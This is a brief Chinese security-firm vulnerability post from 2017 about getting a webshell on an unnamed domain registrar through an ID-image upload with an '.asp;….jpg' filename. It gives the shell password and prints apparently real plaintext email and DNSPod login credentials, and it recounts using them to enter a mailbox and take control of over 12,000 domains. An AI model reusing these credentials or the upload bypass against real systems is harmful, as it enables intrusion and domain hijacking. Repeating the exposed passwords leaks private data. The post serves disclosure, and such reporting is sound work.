首页 > 漏洞预警和分析 > 某域名厂商验证不当导致存在getshell漏洞

某域名厂商验证不当导致存在getshell漏洞

[2017.11.29]

注册个账号 在模板认证处上传身份证 抓包


shell地址:http://xxxx//T.asp;201612701926742.jpg
密码 xiaojiege



图片服务器和主站不是同一台服务器! 翻代码翻到一个邮箱账号 

uname="linliangemail@qq.com"

pwd="jmHl862613"

atoumail="linliangemail@qq.com"


登陆邮箱 一片惊喜! 



还可以直接转走人家的域名



还是各种域名商的代理!! 感觉有的搞
然后就回去继续翻源代码 又发现一个请求 

loginurl="https://www.dnspod.cn/Auth/Login"

logindata="email=linliangemail%40qq.com&password=jmHl862613&remember=1"

loginck=winhttp_html(loginurl,logindata,"POST","gb2312","https://www.dnspod.cn",1,"nullcc")


尝试登陆
结果直接控制12369个域名和监控9台主机



业务咨询联系方式:
网络信息安全服务:13581958748 汪经理     软件信息系统评测:13811226090 彭经理     移动终端设备检测:18611706493 张经理     网络系统设备检测:13522983759 路经理     传输配套设备检测:13466736366 白经理     
友情链接
北京通和实益电信科学技术研究所有限公司 版权所有 京ICP备15030238号-1